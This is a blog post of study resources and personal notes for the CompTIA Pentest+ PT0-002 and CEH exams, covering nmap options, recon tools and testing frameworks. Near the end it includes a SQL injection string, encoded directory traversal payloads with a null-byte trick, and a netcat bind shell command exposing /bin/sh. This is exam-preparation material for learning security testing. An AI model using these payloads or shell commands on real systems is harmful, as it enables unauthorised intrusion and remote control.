Preparing for the CompTIA Pentest+ PT0-002 Exam

Yesterday we provided some commentary on the PT0-002 exam.  Today I am going to share my study resources and notes.

First. there are some excellent articles about this from Globalcerts and on Reddit.  I used their guidance to help me prepare for this exam.  I usually do not do a lot of prep for certification exams, especially when I am simply renewing or updating my credential.  But I had failed the PT0-001 several years ago, and the difficulty of this exam got me into some serious study and preparation.


EC-Council iLabs for CEH v11  I had access to this practice lab left over from when I was studying for the Certified Ethical Hacker v11 exam.  The is a considerable amount of content overlap between the CEH and the Pentest+, so it worked for me in terms of getting some hands-on labs experience.  You will need it for the PT0-002 exam.  DO NOT SKIP HANDS ON LAB TRAINING!   TryHackMe has at Pentest+ track.  If you really want to be a pen-tester some day, know your way around the command line, terminal, and tools like nMap and Wireshark are essential.  Coding and scripting are essential.  Job interviews with Pen-testing firms usually come with a hands-on lab test.

Jason Dion’s practice exam for PT0-002  I bought web access for these practice exam questions and found them to be excellent, and reasonably close to questions I actually had on the exam.  I did all of the six test once, and tests 1-3 a second time.  Take time to go back and review the questions you got wrong by reading the explanation.

CompTIA Official Pentest+ eBook and training slides  I had access to these resources through my membership with the CompTIA Instructors Network.  If you have limited cybersecurity experience, you probably out to take some time reading a good text book, like this one, or something from the Wiley/Sybex catalog.

Kali Linux  Install Kali Linux in an old or second hand computer, or better yet, install it as a virtual machine on your personal laptop.  You need to know what the tools are used for, and with Kali, you can practice.

Study Notes

I rarely use study notes, just not my style, but I made an exception for both the CEH v11 and the PT0-002. These notes that follow are a combination of the notes I took for both these exams.

Linux commands  You must know these, and Kali will give you a place to play.

My notes

Module 01 introduction

ICT = information and communication technology

InfoWar = information warfare including:
C2 warfare
intelligence based warfare
electronic warfare
hacker warfare
economic warfare

Defensive vs Offensive infowar

Cyber Kill Chain
Actions on objectives

Adversary Behavioral Identification
internal recon
Proxy activities
Command Line Interface
HTTP User Agent
DNS Tunneling
Web Shell
Data Staging

IOC Types (Indications of Compromise)
atom indicator
computed indicator
behavioral indicator

IOC Categories

Information Assurance (IA)
Information Risk Management (IRM)

Level of Risk = consequence x likelihood

Incident Handling
Incident recording and assignment
Evidence gathering and forensics
Post Incident Activities

Vunerability Management Lifecycle

Module 02 Footprinting and reconnaissance

Netcraft for finding subdomains and website footprinting
TheHarvester for finding LinkedIn information
BuzzSumo for social media sites

Infoga for email data from public sources
Netcraft for type of web server
ZoomInfo for public information about companies and employees
Factiva for news aggregation and archiving

InstantRecon uses Shodan to find open port info
Bluto for DNS enumeration uses Alexa Top 1 million
dnsenum is DNS enumeration tool using a Perl script
SubBrute is DNS enumerator that recursively crawls DNS records

Firewall Bypass Tools
Super Network Tunnel – HTTP port 80
NSTX – DNS port 53
Bitvise – SSH port 23
Loki – ICMP

Module 3 Scanning Networks

-a hostname
-A IP address
NetBIOS code Type Description
<00> Unique Host name
<00> Group Domain Name
<03> Unique Messenger service
<1B> unique Domain master browser(PDC)
<1C> Group Domian controller
<1D> Group Master browser
<20> Server service

-A aggressive scanning
-PA TCP ACK scan
-PU UDP ping scan
-PR ARP scan
-PS TCP SYN scan
-PE ICMP Echo scan
-PP ICMP Timestamp Ping
-PM Address Mask Ping
-PS TCP SYN ping scan
-sC enable Nmap Scripting Engine for advanced discovery
-sI idle scan
-sF FIN scan
-sM Maimon scan (FIN/ACK)
-sn ping scan icmp (no port scanning)
-sN null scan no flags
-sS stealth scan SYN scan half open (hides from logs)
-sU UDP scan
-sT TCP Connect Full Open scan (checks all ports, leaves tracks)
-sX Xmas or Inverse TCP Flag scan set FIN PSH URG flags
OS discovery
-O <target> operating system discovery
-6 -O <target> OS discovery IPv6 fingerprinting
-oG output in greppable format
-oX output in XML format
-oN output in normal format
–script smb-os-discovery.nse OS discovery
–enip-info – <port44818> device type, vendor ID, serial number, IP address
–smb-os-discovery – <port 445> OS machine name, domain name, netbios, workgroup. system time.
–netbus-info <port 12345> connects to a Netbus server for applications, user ID, password, email address

WINS.MIB – Windows WINS info
HOSTMIB.MIB – Hosts on the network
MIB_II.MIB – TCP/IP information about network hosts
LMMIB2.MIB – workstation and server services and SNMP config

.bash_profile – commands and environmental variables
.bash_logout – config commands on logout
.bashrc – automatic config on loading BASH
.bash_history – short history of recent commands

LDAP Browsing
JXplorer – Java
Luma – Python (Linux)
Gawor’s LDAP – Java
Coral Directory – Windows

Module 3 Scanning Networks

hping Commands
hping3 -1 – ICMP ping scan
hping3 -A -p 80 – ACK scan on port 80
hping3 -2 -p 80 – UDP scan on port 80

Scanning tools
SolarWinds Port Scanner
PRTG Network Monitor
OmniPeek Network Protocol Analyzer

Scanners for mobile
IP Scanner for iOS
Fing for iOS and Android
Network Scanner for Android

Host Discovery
arp ping scan
udp ping scan
icmp ping scan
icmp ECHO ping (nmap -PE)
icmp ECHO ping sweep
icmp Timestamp ping (stateful firewalls) (nmap -PP)
icmp Address Mask Ping (nmap -PM)
TCP Ping Scan
IP Protocol Scan

Ping Sweep Tools
Angry IP Scanner – I use this one all the time
Solar Winds Engineer’s Toolset
Colasoft Ping Tool
Visual Ping Tester

Port and Service Discovery

OS Discovery and Banner Grabbing

nmap -O – operating system discovery
namp -6 -O <target> OS discovery IPv6 fingerprinting

Direct TTL Probes when the attacker is on a different subnet from the victim
Operating System (OS) Time To Live TCP Window Size
Linux (Kernel 2.4 and 2.6) 64 5840
Google Linux 64 5720
FreeBSD 64 65535
OpenBSD 64 16384
Windows 95 32 8192
Windows 2000 128 16384
Windows XP 128 65535
Windows 98 Vista 7 Server 2008 128 8192
iOS 12.4 (Cisco Routers) 255 4128
Solaris 7 255 8760
AIX 4.3 64 16384



Know how to recognize SQL and XML Injection
the attacker modifies the ‘id’ parameter value in their browser to send: ‘ or ‘1’=’1.
For example:’ or ‘1’=’1

Know all the forms of Directory Traversal
This attack is also known as (../) “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”
Request variations
Encoding and double encoding:

%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\
and so on.

Percent encoding (aka URL encoding)
Note that web containers perform one level of decoding on percent encoded values from forms and URLs.

..%c0%af represents ../
..%c1%9c represents ..\
OS specific

Root directory: “ / “
Directory separator: “ / “

Root directory: “ <partition letter> : \ “
Directory separator: “ / “ or “ \ ”
Note that windows allows filenames to be followed by extra . \ / characters.
In many operating systems, null bytes %00 can be injected to terminate the filename. For example, sending a parameter like:


will result in the Java application seeing a string that ends with “.pdf” and the operating system will see a file that ends in “.doc”. Attackers may use this trick to bypass validation routines.


Filtered by Stateful Firewall
ACK Scan -sA
no reply – filtered (closed)
ICMP error – filtered (closed)
RST – unfiltered (open)

Port 48101 Mirai used by infected IoT devices to find others to infect

Port 989/990 for FTPS provides TLS encrypted link

Docker Commands
docker d – Docker daemon processes API requests
docker client – provides a CLI to issues commands
docker run – starts container
docker build – new image from Docker file
docker images – lists all local images
docker pull – pulls image from Registry
docker push – pushes image to registry
docker search – search Docker Hub for image
docker tag – assign tag to existing image

Container Technology Architecture
Developer systems – images created and sent for testing
Testing and accredation systems – image tested and sent to Registry
Registries – images stored and distributed to orchestrator
Orchestrators – images converted to containers and deployed to host
Hosts – containers are run or stopped by orchestrator

PHP Errors php.ini file
error_log determines path and file name of the log
log_errors – determines whether error message will be written to a log file
display_errors display in a browser
error_reporting determines which error to report

iPhone Jailbreaking
Tethered – jailbroken once only attaker needs to redo jailbreak Will reboot normally
Semi-tethered – remains jailbroken but requires connect to computer for jailbreak extensions
Semi-untethered – boots normally, but jailbreak over many reboots with sideloaded app
Untethered – permanently jailbroken for every reboot

Vulnerability Assessment
Service-based – mimics attacker perspective, multi-vendor solution managed by third-party
Product-based – single vendor solution, locally managed
Tree-based use lists of vulnerabilities and tests for everything
Inference-based us intelligence gathering to determine which test to run against each host.

The Open Source Security Testing Methodology Manual (OSSTMM) was developed by the Institute for Security and Open Methodologies (ISECOM) and it outlines every area of an organization that needs testing and how to conduct the relevant tests.

The Penetration Testing Execution Standard (PTES) was developed by business professionals as a best practice guide for conducting penetration testing. The PTES contains seven main sections that are used to provide a comprehensive overview of the proper structure of a complete penetration test.

The Open Web Application Security Project (OWASP) is an organization aimed at increasing awareness of web security and provides a framework for testing during each phase of the software development process. The OWASP Testing Guide (OTG) provides different steps for the testing process and outlines the importance of assessing the entire organization, including the people, processes, and technology, during a penetration test.

The Information Systems Security Assessment Framework (ISSAF) is an open-source resource available to cybersecurity professionals. The ISSAF is comprised of documents that relate to penetration testing, such as guidelines on business continuity and disaster recovery along with legal and regulatory compliance.

nc -lp 52154 -e /bin/sh
Using the -lp option sets up a listener on the machine using the port specified (52154 in this scenario).

To start the connection to the listener, you would enter “nc <IPADDR> <PORT> -e <SHELL>”, substituting the details for each parameter in each set of brackets.

Parrot only needs 300MB ram… it is not too picky
It is based on debian
the core of Parrot OS so to speak not too picky… The apps you use can be memory hogs,OS%20guest%20on%20VirtualBox.%20…%20More%20items…%20

IoT articles

Recent Data Breaches – December 2022



About the Author:

I am a cybersecurity and IT instructor, cybersecurity analyst, pen-tester, trainer, and speaker. I am an owner of the WyzCo Group Inc. In addition to consulting on security products and services, I also conduct security audits, compliance audits, vulnerability assessments and penetration tests. I also teach Cybersecurity Awareness Training classes. I work as an information technology and cybersecurity instructor for several training and certification organizations. I have worked in corporate, military, government, and workforce development training environments I am a frequent speaker at professional conferences such as the Minnesota Bloggers Conference, Secure360 Security Conference in 2016, 2017, 2018, 2019, the (ISC)2 World Congress 2016, and the ISSA International Conference 2017, and many local community organizations, including Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2006 at

Add a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.